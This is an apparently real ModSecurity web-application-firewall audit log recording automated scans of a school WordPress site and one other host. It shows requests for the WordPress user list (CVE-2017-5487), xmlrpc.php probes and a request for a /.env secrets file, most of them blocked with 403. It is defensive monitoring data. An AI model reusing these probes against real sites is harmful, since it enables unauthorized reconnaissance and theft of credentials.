(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e11d79-Z-- --ebaf3310-A-- [10/May/2025:22:41:42 +0700] aB9ztsi6w7GTj2w44Z5gHwAAANA 103.236.140.4 53986 103.236.140.4 8181 --ebaf3310-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.40.93.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.40.93.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebaf3310-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebaf3310-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746891702700183 2718 (- - -) Stopwatch2: 1746891702700183 2718; combined=1400, p1=418, p2=959, p3=0, p4=0, p5=23, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebaf3310-Z-- --7838452f-A-- [10/May/2025:22:48:20 +0700] aB91RMi6w7GTj2w44Z5mMwAAAMM 103.236.140.4 41142 103.236.140.4 8181 --7838452f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.65.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.65.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7838452f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7838452f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892100801611 3049 (- - -) Stopwatch2: 1746892100801611 3049; combined=1595, p1=479, p2=1089, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7838452f-Z-- --5df7bd4c-A-- [10/May/2025:22:49:56 +0700] aB91pBLuBiaF9R054QAqeAAAAAY 103.236.140.4 44974 103.236.140.4 8181 --5df7bd4c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.89.174.87 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5df7bd4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5df7bd4c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746892196439877 577 (- - -) Stopwatch2: 1746892196439877 577; combined=209, p1=183, p2=0, p3=0, p4=0, p5=26, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5df7bd4c-Z-- --341f4767-A-- [10/May/2025:22:55:23 +0700] aB9266uC4AqLGUOyzyW2UgAAAII 103.236.140.4 58424 103.236.140.4 8181 --341f4767-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --341f4767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --341f4767-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892523796374 3609 (- - -) Stopwatch2: 1746892523796374 3609; combined=1886, p1=530, p2=1327, p3=0, p4=0, p5=29, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --341f4767-Z-- --a96c8c67-A-- [10/May/2025:22:55:28 +0700] aB928Mi6w7GTj2w44Z5s7AAAANc 103.236.140.4 58614 103.236.140.4 8181 --a96c8c67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a96c8c67-C-- demo.sayHello --a96c8c67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a96c8c67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892528103192 4824 (- - -) Stopwatch2: 1746892528103192 4824; combined=3453, p1=498, p2=2763, p3=29, p4=29, p5=78, sr=60, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a96c8c67-Z-- --b760b83f-A-- [10/May/2025:22:55:36 +0700] aB92-Nr9PbfRBMhzxmQmtgAAAEg 103.236.140.4 58978 103.236.140.4 8181 --b760b83f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b760b83f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b760b83f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892536842919 2677 (- - -) Stopwatch2: 1746892536842919 2677; combined=1177, p1=388, p2=694, p3=0, p4=0, p5=95, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b760b83f-Z-- --32886176-A-- [10/May/2025:22:55:36 +0700] aB92-Nr9PbfRBMhzxmQmuAAAAFQ 103.236.140.4 58982 103.236.140.4 8181 --32886176-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --32886176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32886176-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892536879304 2642 (- - -) Stopwatch2: 1746892536879304 2642; combined=1419, p1=447, p2=940, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32886176-Z-- --950c0d1b-A-- [10/May/2025:22:55:46 +0700] aB93Atr9PbfRBMhzxmQm4gAAAEw 103.236.140.4 59364 103.236.140.4 8181 --950c0d1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --950c0d1b-C-- demo.sayHello --950c0d1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --950c0d1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892546281821 5128 (- - -) Stopwatch2: 1746892546281821 5128; combined=3871, p1=492, p2=3190, p3=27, p4=30, p5=78, sr=60, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --950c0d1b-Z-- --96c38d7c-A-- [10/May/2025:22:55:46 +0700] aB93AhLuBiaF9R054QAw3gAAABA 103.236.140.4 59384 103.236.140.4 8181 --96c38d7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96c38d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c38d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892546689297 2638 (- - -) Stopwatch2: 1746892546689297 2638; combined=1194, p1=383, p2=781, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c38d7c-Z-- --6c0b751f-A-- [10/May/2025:22:55:46 +0700] aB93AhLuBiaF9R054QAw3wAAABQ 103.236.140.4 59386 103.236.140.4 8181 --6c0b751f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c0b751f-C-- demo.sayHello --6c0b751f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c0b751f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892546703251 4633 (- - -) Stopwatch2: 1746892546703251 4633; combined=3394, p1=418, p2=2792, p3=31, p4=31, p5=72, sr=58, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c0b751f-Z-- --85f8787c-A-- [10/May/2025:22:55:50 +0700] aB93Btr9PbfRBMhzxmQm8QAAAFc 103.236.140.4 59566 103.236.140.4 8181 --85f8787c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85f8787c-C-- demo.sayHello --85f8787c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f8787c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892550546164 4116 (- - -) Stopwatch2: 1746892550546164 4116; combined=2887, p1=398, p2=2313, p3=27, p4=25, p5=72, sr=49, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f8787c-Z-- --9dc11e13-A-- [10/May/2025:22:56:16 +0700] aB93IKuC4AqLGUOyzyW3IgAAAJA 103.236.140.4 60586 103.236.140.4 8181 --9dc11e13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9dc11e13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dc11e13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892576150486 3218 (- - -) Stopwatch2: 1746892576150486 3218; combined=1372, p1=448, p2=891, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dc11e13-Z-- --f18f695c-A-- [10/May/2025:22:56:23 +0700] aB93J8i6w7GTj2w44Z5t3gAAAMU 103.236.140.4 60906 103.236.140.4 8181 --f18f695c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f18f695c-C-- demo.sayHello --f18f695c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f18f695c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892583685385 5214 (- - -) Stopwatch2: 1746892583685385 5214; combined=3819, p1=516, p2=2952, p3=27, p4=31, p5=158, sr=72, sw=135, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f18f695c-Z-- --3b763126-A-- [10/May/2025:22:57:24 +0700] aB93ZKuC4AqLGUOyzyW4iQAAAIM 103.236.140.4 35074 103.236.140.4 8181 --3b763126-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b763126-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b763126-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892644559251 2790 (- - -) Stopwatch2: 1746892644559251 2790; combined=1223, p1=412, p2=782, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b763126-Z-- --303eb971-A-- [10/May/2025:22:57:29 +0700] aB93aRLuBiaF9R054QAyKwAAABU 103.236.140.4 35264 103.236.140.4 8181 --303eb971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --303eb971-C-- demo.sayHello --303eb971-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --303eb971-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892649463949 4937 (- - -) Stopwatch2: 1746892649463949 4937; combined=3372, p1=608, p2=2588, p3=24, p4=25, p5=73, sr=84, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303eb971-Z-- --ac894f32-A-- [10/May/2025:22:59:41 +0700] aB937ci6w7GTj2w44Z5xYQAAAM8 103.236.140.4 40714 103.236.140.4 8181 --ac894f32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac894f32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac894f32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746892781759339 2632 (- - -) Stopwatch2: 1746892781759339 2632; combined=1120, p1=392, p2=703, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac894f32-Z-- --3b772252-A-- [10/May/2025:22:59:48 +0700] aB939Nr9PbfRBMhzxmQqVwAAAEw 103.236.140.4 40980 103.236.140.4 8181 --3b772252-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b772252-C-- demo.sayHello --3b772252-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b772252-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892788824264 5143 (- - -) Stopwatch2: 1746892788824264 5143; combined=4083, p1=520, p2=3339, p3=31, p4=36, p5=93, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: 